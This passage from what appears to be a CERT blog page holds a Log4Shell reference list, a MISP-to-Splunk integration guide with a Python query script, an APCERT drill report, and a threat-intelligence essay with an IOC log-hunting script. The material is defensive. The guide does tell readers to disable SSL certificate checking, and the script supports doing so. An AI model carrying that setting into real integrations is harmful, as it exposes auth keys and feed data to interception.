[30] ISC SANS Diary https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/
[31] ISC SANS Diary https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/
[32] Crowdstrike https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
[33] Bleeping Computer https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
[34] Trusted Sec https://www.trustedsec.com/blog/log4j-playbook/
[35] Bleeping Computer https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
[36] Reddit list of resources on log4j https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/
[37] CVE-2021-44228-Log4Shell-Hashes https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
[38] NCSC-NL https://github.com/NCSC-NL/log4shell
[39] BlueTeam CheatSheet https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
[40] Log4ShellDetector https://github.com/Neo23x0/log4shell-detector
[41] Bazaar https://bazaar.abuse.ch/browse/tag/log4j
[42] URLHaus https://urlhaus.abuse.ch/browse/tag/log4j
[43] Threatfox https://threatfox.abuse.ch/browse/tag/log4j
[44] CuratedIntel https://github.com/curated-intel/Log4Shell-IOCs
[45] Microsoft Guidance https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
[46] TryHackMe https://tryhackme.com/room/solar
[47] Twitter https://twitter.com/80vul/status/1470272820571963392
[48] Twitter https://twitter.com/ankit_anubhav/status/1470648109625536515
[49] Twitter “@FiloSottile” https://twitter.com/FiloSottile/status/1469441487175880711
[50] Twitter “@matthew_d_green” https://twitter.com/matthew_d_green/status/1469715416549367812
[51] ITNews https://www.itnews.com.au/news/log4js-project-sponsorship-skyrockets-after-critical-bug-exploitation-573914

Setting up MISP as a threat information source for Splunk Enterprise

1 Nov 2021

By Nicholas Soysa, AUSCERT

Disclaimer: The following information is only relevant to AUSCERT members who are formally part of the CAUDIT-ISAC or AUSCERT-ISAC. For more info on this optional add-on service, please refer to the following page

1. Get a license or free trial account.
If you're an existing Splunk customer, you should already have the credentials to access Splunk. If you want to try it out first, you can obtain a limited free trial account at https://www.splunk.com/en_us/download.html.

2. Install and run Splunk Enterprise.
- Download the appropriate installer for your platform (32- or 64-bit) and follow the installation steps.
- Launch the Splunk Enterprise search head.
- Log into your Splunk Administrator account.

IMPORTANT: MISP42Splunk 4.3.0 has been merged into the master branch, so the information in section 3 is no longer relevant. You can now update misp42splunk using the "Upgrade App" option (existing app) or the "Install" option (fresh installs), as usual.

3. Install and set up MISP42Splunk
MISP42Splunk 2.2.0 is not currently in the master branch. Until the update is merged, download the file from the GitHub repo at https://github.com/remg427/misp42splunk/tree/2.2.0, then:
- Extract the ZIP archive.
- Convert the folder "misp42splunk" to TAR.GZ format using a utility such as 7-Zip or the command line.
- Return to the Splunk app and navigate to "Apps".
- Select the "Install App from file" option.
- Select the archive misp42splunk.tar.gz which you created and click Upload.
- Restart Splunk when prompted.

4. Add a MISP instance
- Create a MISP instance name, for example "AUSCERTMISP".
- MISP URL = base URL of the MISP instance (e.g. https://misp-c.auscert.org.au or https://misp.auscert.org.au).
- For "Set the MISP auth key", enter a valid API key for a MISP user which has authkey access privileges. This is typically any user with "User" up to "Org admin" roles.
- Untick the "Check SSL certificate of MISP server" box.
- We no longer require a client certificate to authenticate: untick "Use a client certificate" if it is ticked.
- Press "Save". Once the save is completed, you will be returned to the Apps page.

5. Check it works
- Navigate to the MISP42 app (Apps dropdown -> MISP42).
- In the MISP42 app page, select Reports.
- Then select, for example: mispgetioc misp_instance=AUSCERTMISP last=1d
- If the app works, you should see Attributes from MISP events returned in the report.
It is suggested to store the feeds in an index which can then be queried in future if needed.

6. Resources
- CAUDIT-ISAC users can access the PDF version at: https://wordpress-admin.auscert.org.au/publications/2018-08-22-misp-integration (Member portal login required)
- AUSCERT-ISAC users can access the document at: https://wordpress-admin.auscert.org.au/publications/2019-03-04-misp-integration (Member portal login required)

7. Credits
Thanks to Remi Seguy (author of misp42splunk) for promptly implementing this feature request.
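If step 5 returns nothing, it helps to know whether the problem is the Splunk app or the MISP base URL and auth key themselves. The script below is an added example (not AUSCERT's or misp42splunk's code) that issues the MISP REST attribute search for the last day directly and flattens the result into the event_id/type/value rows the report shows; MISP_URL, MISP_KEY and SAMPLE_RESPONSE are placeholders and constructed data, not real values.

```python
import json
import ssl
import urllib.error
import urllib.request

# Placeholders, not real values: use the base URL and auth key from step 4.
MISP_URL = "https://misp.example.invalid"
MISP_KEY = "<your MISP auth key>"

# Constructed sample of a restSearch response, so the parser can run offline.
SAMPLE_RESPONSE = {"response": {"Attribute": [
    {"event_id": "1001", "type": "url", "value": "http://bad.example.invalid/x"},
    {"event_id": "1001", "type": "sha256", "value": "0" * 64},
]}}

def build_restsearch_request(base_url, auth_key, last="1d", verify_tls=True):
    """Build POST /attributes/restSearch with a 'last' window, the MISP REST
    search that a last=1d attribute pull relies on. Returns (Request, SSLContext)."""
    body = json.dumps({"returnFormat": "json", "last": last}).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/attributes/restSearch", data=body, method="POST",
        headers={"Authorization": auth_key,  # raw key, no "Bearer" prefix
                 "Accept": "application/json", "Content-Type": "application/json"})
    ctx = ssl.create_default_context()
    if not verify_tls:  # same effect as unticking "Check SSL certificate of MISP server"
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    return req, ctx

def attributes_to_rows(payload):
    """Flatten {"response": {"Attribute": [...]}} into event_id/type/value rows."""
    return [{"event_id": a["event_id"], "type": a["type"], "value": a["value"]}
            for a in payload.get("response", {}).get("Attribute", [])]

def fetch_last(base_url=MISP_URL, auth_key=MISP_KEY, last="1d", verify_tls=True):
    """Run the query; HTTP 403 means the key is wrong or lacks API access."""
    req, ctx = build_restsearch_request(base_url, auth_key, last, verify_tls)
    try:
        with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
            return attributes_to_rows(json.load(resp))
    except urllib.error.HTTPError as e:
        if e.code == 403:
            raise PermissionError("MISP rejected the auth key (HTTP 403)") from e
        raise

if __name__ == "__main__":
    for row in attributes_to_rows(SAMPLE_RESPONSE):  # offline run on the sample
        print(row)
```

Inside Splunk, appending `| collect index=<your_index>` to the mispgetioc search stores the returned attributes in an index as step 5 suggests (the index must already exist).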

APCERT CYBER DRILL 2021

1 Sep 2021

The progression toward a growing reliance on the e-economy within the Asia Pacific region requires ongoing protection of the various infrastructures integral to political and economic stability and security. The Asia Pacific Computer Emergency Response Team (APCERT) recently conducted its annual drill, a means of maintaining and improving awareness and skills within the cyber security community through this collaborative undertaking. This year's theme, "Supply Chain Attack Through Spear-Phishing – Beware of Working from Home", reflects real-world incidents and issues experienced globally. As a founding member, AUSCERT has participated in every drill since their inception, with Operations Manager Geoff Thonon stating that the drill is "More important than ever". "Whilst there is a time limit, the purpose of the drill isn't to identify the fastest (CERT) team but rather, to work collaboratively to challenge and develop everyone's skills", Geoff continued. The experiences and tasks conducted by each participating team allow for knowledge sharing, with no CERT typically experiencing the same issues or providing like-for-like services. The APCERT drill aims to maintain and progress internet security and safety, with the exercise providing participants the chance to improve communication protocols, technical responses and the overall quality of incident responses. Although undertaken in a few hours, the lessons learned from the experience can continue long after. Analysing the challenges, choices and responses of teams provides an insight into the various perspectives of other participants. "The information available to each team from the drill provides a greater understanding of the how and why that can lead to year-round training and development for staff", Geoff stated.
With 26 CERTs from 20 economies within the Asia Pacific region taking part, there is a wealth of knowledge and experience to draw upon in the quest for ongoing learning and growth within the sector. As each drill typically requires six to eight months of planning and preparation, the 2022 APCERT Cyber Drill will soon be underway – the ongoing need for education and skill enhancement a reflection of the rapid development of the digital world we now reside in!

Using threat intelligence to produce a cyber defence strategy

20 Aug 2021

Very few practitioners need to be told of contemporary cyber threats such as ransomware; it has found its way into the common language of risk assessments, disaster recovery plans and mainstream media alike. But what can be done other than writing playbooks and practising response plans, following the Essential 8 and blocking known malicious indicators? Those organisations with a strategic approach to cyber defence will more likely survive a ransomware attack, and consideration of an attacker's motive may be key to mounting a successful defence. For example, if the motive is purely financial and the attacker causes significant business disruption if the ransom demand is not met, what controls can prevent this? However, if the motive is to hold to ransom the intellectual property, customer database or another information asset, should priority instead be given to controls which detect and mitigate data exfiltration? Whilst senior management's risk tolerance level may be "we must implement all possible countermeasures," few organisations will have the luxury of doing so. Utilising available data sets to form operational "cyber threat intelligence" can help mitigate harmful events such as ransomware attacks. Most importantly, doing so is within the reach of most organisations following the explosion of available open-source tools and data sets. Such "tactical" cyber threat intelligence usually consists of Indicators of Compromise (IoCs) – technical data such as known bad IP addresses, URLs, emails and file hashes. Here is where the value proposition of CERTs (Cyber Emergency Response Teams) pays off: not-for-profit organisations providing open source and member-funded services, passionate teams consisting of analyst, dev-ops and engagement functions, CERTs are trustworthy due to their independent status.
CIRCL from Luxembourg famously produce the Malware Information Sharing Platform (MISP) and tactical data feeds, used worldwide by other CERTs including AUSCERT, governments and private enterprise. Many organisations do not have resources beyond the tactical level; however, simply using tactical feeds of IoCs has been shown to be effective in detecting or even preventing the initial stages of a ransomware attack. Relevant and concise IoCs may be used in content filters, centralised logging, SIEM or even custom-scripted solutions to hunt or block threats. AUSCERT's Malicious URL Feed is an example of a high-confidence, low-volume feed, usually consumed in an automated fashion but also suitable for manual threat hunting, depending upon the consumer's available resources. Members of AUSCERT's MISP community can study operational intelligence such as attackers' tools, techniques and procedures, even visually. A "mind map" connects similar events and data, allowing members to correlate campaigns and understand the techniques used in incidents such as ransomware attacks, for example. Organisations can then form strategic plans regarding the risks associated with cyber threats. Most importantly of all, a collaborative approach must be foremost in discussions regarding cyber defence strategy. A common misconception is that sharing threat information may compromise competitive advantage; however, a particular strength of CERTs is coordinating, anonymising and analysing incident data, and then providing operational intelligence to members – even entire sectors. Have you included your local CERT in your IR (Incident Response) plans?

Mike Holm, Senior Manager, AUSCERT
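The "custom-scripted" hunting mentioned above is the simplest way to consume a low-volume, high-confidence feed. The script below is an added example (not AUSCERT's code or feed) that takes indicators in MISP attribute form (url, domain, ip-dst), indexes them by type, and runs proxy log lines past them; the IOC_FEED and PROXY_LOG values are constructed samples, and the domain check deliberately requires an exact or subdomain match so that look-alike hosts do not produce false hits.

```python
from urllib.parse import urlsplit

# Constructed feed shaped like MISP attributes (type/value); not real indicators.
IOC_FEED = [
    {"type": "url", "value": "http://bad.example.invalid/payload.bin"},
    {"type": "domain", "value": "c2.example.invalid"},
    {"type": "ip-dst", "value": "198.51.100.23"},
]

# Constructed proxy log lines: time src_ip dst_ip method url status
PROXY_LOG = """\
2021-08-20T10:00:01Z 10.0.0.5 203.0.113.9 GET https://www.example.invalid/ 200
2021-08-20T10:00:07Z 10.0.0.8 198.51.100.23 GET http://bad.example.invalid/payload.bin 200
2021-08-20T10:00:09Z 10.0.0.8 203.0.113.20 POST https://api.c2.example.invalid/beacon 204
2021-08-20T10:00:15Z 10.0.0.9 203.0.113.30 GET https://c2.example.invalid.com/ 200
"""

def index_feed(feed):
    """Bucket attributes by MISP type so each log field is compared to the right set."""
    idx = {"url": set(), "domain": set(), "ip": set()}
    for a in feed:
        if a["type"] == "url":
            idx["url"].add(a["value"].rstrip("/").lower())
        elif a["type"] in ("domain", "hostname"):
            idx["domain"].add(a["value"].lower())
        elif a["type"] in ("ip-dst", "ip-src"):
            idx["ip"].add(a["value"])
    return idx

def host_matches(host, domains):
    """Exact or subdomain match only: 'c2.example.invalid.com' must not match."""
    return any(host == d or host.endswith("." + d) for d in domains)

def hunt(log_text, feed):
    """Return one hit per log line that matches the feed, with the reason(s)."""
    idx = index_feed(feed)
    hits = []
    for line in log_text.splitlines():
        ts, src, dst, _method, url, _status = line.split()
        host = (urlsplit(url).hostname or "").lower()
        reasons = [r for r, ok in (("url", url.rstrip("/").lower() in idx["url"]),
                                   ("domain", host_matches(host, idx["domain"])),
                                   ("ip-dst", dst in idx["ip"])) if ok]
        if reasons:
            hits.append({"time": ts, "src": src, "url": url, "matched": reasons})
    return hits

if __name__ == "__main__":
    for hit in hunt(PROXY_LOG, IOC_FEED):
        print(hit)
```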
